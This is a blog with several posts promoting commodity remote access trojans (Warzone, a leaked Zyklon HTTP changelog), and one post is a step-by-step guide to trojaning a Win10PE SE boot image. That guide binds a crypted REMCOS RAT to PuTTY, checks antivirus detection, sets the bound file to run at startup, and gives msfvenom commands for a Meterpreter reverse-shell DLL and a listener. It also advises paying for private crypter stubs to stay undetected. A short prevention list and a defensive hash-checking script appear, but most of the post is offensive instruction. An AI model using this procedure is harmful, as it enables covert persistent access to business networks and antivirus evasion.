Thursday, May 9, 2019

Warzone RAT 1.89 as of May 9th 2019 Not a bad RAT

This RAT has a UAC bypass that works, as of May 9th 2019, on Windows 7 through 10. It creates a Windows Defender exclusion for itself. It has a working password recovery module for Firefox, Edge and Chrome, a keylogger, and regular VNC. It has hidden RDP for machines that have previously used RDP; this is silent on Windows 7 but not on Windows 10, where the user is prompted that there is an RDP request. It also has a remote shell, a process manager, a remote webcam viewer and reverse SOCKS.

Thursday, August 17, 2017

Zyklon HTTP leaked version 1.3.0.1 Updated version has native loader

Zyklon HTTP version 1.3.0.1 was leaked on the opensc forum and other forums. The leaked version of the bot I tested in a virtual machine appears to be backdoored, as you can't successfully uninstall the bot without it coming online a few minutes later. The newest version I am currently aware of, version 1.4.0.0, boasts a native loader without the need for .NET, which is a huge deal considering its accessible price point of around $125.00 with an option for 3 .onion domains.


Zyklon HTTP Change Log
v1.4.0.0
-Added on connect tasks [You are now able to create tasks that will execute as soon as the client is first seen in the panel]
-Task execution is now faster [No more delays when executing multiple tasks]
-Native loader is completely recoded
-Added UAC bypass
-Botkiller module optimized
-Better persistence [System wide injection only for x86 processes for now]
-Tor is no longer injected and instead is run in the address space of current executable
-Tor updated to newer version
-Added option to choose if you want to run Zyklon H.T.T.P main process in the address space of system process
-Downloaded plugins are now stored encrypted with a key derived from the machine HWID and with a file name derived from the machine HWID [No more filename based detections]
-Added support for https links when downloading files
-Normal version file size is reduced to less than 200kb
-Better crypter compatibility
-Added new filters in the panel when creating new tasks
-Various panel bugfixes and improvements
-The client now connects to index.php instead of gate.php

v1.3.0.0
-Added native loader [The bot now works on all .NET framework versions, persistence works even if there is no .NET framework installed]
-Improved stability
-Auto logout after 10min of inactivity in the panel
-Keylogger added
-Reverse socks proxy added
-Miner removed
-Fixed bug with UDP flood where port was always 80
-Added automatic updater to make it easier to update your clients
-Added download files over tor
-Added update on the fly [Zyklon H.T.T.P will just download the file from specified link and replace the installed file.]
-Added option to create cron jobs in the installer
-World map can show only online or all clients.
-Added help page with some explanations [More will come in the future]
-Added a % next to a numbers in the statistics page
-Added options to check keylogger logs and recovered browser passwords when you click client IP
-Panel now sanitizes all user input variables before displaying them to the end user
-Fixed bug where the submenu would collapse when the page was selected
-Optimized persistence module
-Added option to download tor from the server using tor2web and similar proxies. [Tor version stub size reduced from 1.3mb to 280kb]
-Added few new database options
-Fixed the bug where you could put a string as parameters in knock time, offline time, dead time and botkiller cycle.
-Fixed the bug with cloud based malware inspection where the api key was not set correctly.
-Limited cloud based malware inspection only to startup items [This is because VT allows only 4 requests per minute using one api]
-Fixed the issue with downloading logs on some systems.
-Changed the way the settings were passed to the client. The client receives the new settings as soon they are applied in the panel. No need to wait for restart.
-Various other code optimizations and small bugfixes


v1.2.0.0
-Added option to change socks proxy port in the panel
-Botkiller Optimized
-Improved stability
-Password recovery module updated
-Added a few new database options in the panel
-Various bug fixes and minor code changes
-Tor module optimized, faster connection to the Tor network
-Added option to group clients


v1.1.0.0
-Added Tor support [Nothing is dropped or downloaded]
-Added Botkiller [It will detect injected processes]
-Client basecode optimized
-Added various new options in the panel
-Updated password recovery for newest Mozilla Firefox and various other software.
-CloudFlare support added


v1.0.1.0
-Improved persistence [The bot now injects watchdog threads into other processes that protect the main process, startup regkeys/files and main file]
-Improved crypter compatibility
-Fixed a bug where bot was not uninstalling correctly
-Socks5 proxy optimized for better performance
-Added multiple startup methods


v1.0.0.0
-Initial Release


Wednesday, October 12, 2016

Persistent Backdooring Win10PE SE ISO or WIM

My goal was to create a persistent backdoor on a small business or corporate network using a Win10PE SE build, on either an ISO or WIM file, within the skill level of any attacker. I chose to use the REMCOS RAT. REMCOS is a RAT used for good and bad; it's a tool that is often used by blackhats, and at a price of only 60.00 a month it's worth the cost. http://breaking-security.net/remcos.php
Also, anti-analysis can prolong the life of your backdoor.

I chose the Octopus crypter/binder (a crypter is a tool used to evade anti-virus detection; a binder attaches malware to a legitimate program so that the legitimate program and the RAT server execute simultaneously) to bind to Putty as an example of a trusted program. As for crypters, you can use old free crypters or you can get something modern with a private stub, giving you months without detection.

Note that most of the functions work on REMCOS, notably the file manager and DLL injection. I tested Metasploit's Meterpreter RAT by injecting the DLL payload meterpreter.dll. I found that not only did Meterpreter work, but it was also possible to pivot off the Windows 10 PE SE live ISO file or WIM. The pivot allows the attacker to enumerate and exploit machines on any other networks connected to the machine running the Windows 10PE SE ISO or WIM.

I tested Empire and successfully injected the DLL payload Empire.dll.

An attacker could spread a backdoored Windows 10PE SE ISO or WIM through social engineering, or by using existing access if the person happens to be an insider threat. This threat could probably fly under the radar for a while, giving an attacker sporadic access to the network. The attack is probably only useful if the victim frequently uses the backdoored ISO or WIM (a file which can be set up to boot off the network): http://www.howtogeek.com/162070/it-geek-how-to-network-boot-pxe-the-winpe-recovery-disk-with-pxelinux-v5-wimboot/

Effects of a persistent backdoor trojan

1. An attacker can now access any drive mounted on the infected computer. This can be used to bind the bot or RAT to programs on a persistently mounted hard drive with an OS on it, provided the file system is not encrypted.

2. An attacker could load Metasploit's Meterpreter tool to pivot and attack another machine on a private network.

3. A trojan could last undetected by AV for a long time, months even, if the attacker is willing to get a private stub for encrypting; this could be done with just $100.00.

What can be done to prevent it

1. Don't trust sites that are not well known for "free" compiled ISOs or WIMs of malware-fighting tools.

2. Look to see if there are any untrusted programs in AppsMy when building your ISO or WIM.

3. After building the ISO, scan it for malware with Kaspersky or Bitdefender.

4. Check MD5 hashes to see if a tool has been modified by a binder/crypter.
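As an added defender-side check for points 3 and 4 (this is example code written for this page, not from the original post or any tool it names), the following Python compares each tool extracted from the ISO/WIM against a known-good hash manifest and measures the PE overlay, the region after the last section where binders typically append their payload. The manifest entry, file names and the test image are constructed placeholders; fill the manifest from the vendor's published checksums.

```python
import hashlib
import os
import struct

# Constructed known-good manifest: lower-cased file name -> expected SHA-256.
# The value below is a placeholder, not a real checksum of any PuTTY release.
KNOWN_GOOD = {"putty.exe": "<sha256 from the vendor's checksum file>"}

def digests(data):
    """MD5 (as the post suggests) and SHA-256 (preferred) of a byte string."""
    return hashlib.md5(data).hexdigest(), hashlib.sha256(data).hexdigest()

def pe_overlay_size(data):
    """Bytes after the last PE section (the overlay); None if data is not a PE.
    Binders usually carry their payload here, so a non-zero overlay on a tool that
    shipped without one deserves a closer look (installers and signed files may have one too)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    n_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    first = pe_off + 24 + opt_size                            # first IMAGE_SECTION_HEADER
    end = 0
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each 40-byte header
        size, ptr = struct.unpack_from("<II", data, first + i * 40 + 16)
        end = max(end, ptr + size)
    return max(0, len(data) - end)

def audit_bytes(name, data, manifest=KNOWN_GOOD):
    """Classify one file image as 'ok', 'modified' or 'unknown' and report its overlay."""
    md5, sha = digests(data)
    expected = manifest.get(name.lower())
    status = "unknown" if expected is None else ("ok" if sha == expected else "modified")
    return {"md5": md5, "sha256": sha, "status": status, "overlay": pe_overlay_size(data)}

def audit_files(paths, manifest=KNOWN_GOOD):
    """Run audit_bytes over executables pulled out of the extracted ISO/WIM tree."""
    report = {}
    for p in paths:
        with open(p, "rb") as f:
            report[p] = audit_bytes(os.path.basename(p), f.read(), manifest)
    return report
```

Anything reported as "modified" or "unknown", or a known tool that suddenly carries an overlay, should be quarantined and rebuilt from the vendor's original download rather than trusted.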

Step by Step from a black hat perspective

1. Crypt your RAT and bind it to Putty.exe, for example using Octopus 2.3.2.


2. Check your file for detection https://nodistribute.com


3. You can create a Windows 10 PE ISO or WIM with WinBuilder.
I used Windows 10 Enterprise 2015 LTSB Evaluation trial for the ISO or WIM
Link for WinBuilder http://win10se.cwcodes.net/Compressed/

Launch WinBuilder:
a. Under Utils, click PC Packed
b. Add the backdoored BadPutty to a zip file, BadPutty.zip
c. Name the backdoor executable in the zip file above BadPutty.exe

1. Click AppsMy
a. Click 2Prepare
b. Click BadPutty
c. Only select startup

4. Boot your Win10PE SE ISO or WIM file. Putty will automatically load, executing Putty and the RAT bound to it.

Create a DLL payload, meterpreter.dll, in Kali. For example:
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=1337 -b "\x00" -e x86/shikata_ga_nai -f dll -o /root/Desktop/Meterpreter.dll
For the handler, first start Metasploit in Kali:
root@kali:~# msfconsole
use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.202.133
msf exploit(handler) > set LPORT 1337
msf exploit(handler) > exploit -j

Create a DLL payload, Empire.dll (tested in Kali).

Load your DLL payload into memory with Remcos.

Any feedback would be greatly appreciated.

Sunday, June 1, 2014